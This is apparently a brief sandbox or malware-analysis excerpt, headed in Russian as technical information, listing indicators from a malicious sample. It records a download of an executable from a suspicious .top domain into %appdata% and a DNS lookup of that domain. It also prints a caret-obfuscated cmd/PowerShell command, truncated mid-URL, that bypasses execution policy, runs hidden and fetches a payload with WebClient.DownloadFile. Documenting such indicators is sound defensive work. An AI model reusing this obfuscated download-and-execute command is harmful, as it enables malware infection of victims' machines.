Техническая информация
- http://poooperfath.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWeRShe^lL^.eXe ^-ExeC^U^TI^OnP^oli^c^Y bY^P^a^S^S ^-N^op^RoF^il^e ^-^WIndows^tyl^e ^hi^dDe^n^ ^(n^e^W-^OBjecT^ ^sYstem^.n^et^.W^e^b^cL^I^eNT).d^Ow^N^loAdFI^LE('http://pooop...
- DNS ASK po###erfath.top
- '<SYSTEM32>\cmd.exe' /C "p^OWeRShe^lL^.eXe ^-ExeC^U^TI^OnP^oli^c^Y bY^P^a^S^S ^-N^op^RoF^il^e ^-^WIndows^tyl^e ^hi^dDe^n^ ^(n^e^W-^OBjecT^ ^sYstem^.n^et^.W^e^b^cL^I^eNT).d^Ow^N^loAdFI^LE('http://pooop...' (со скрытым окном)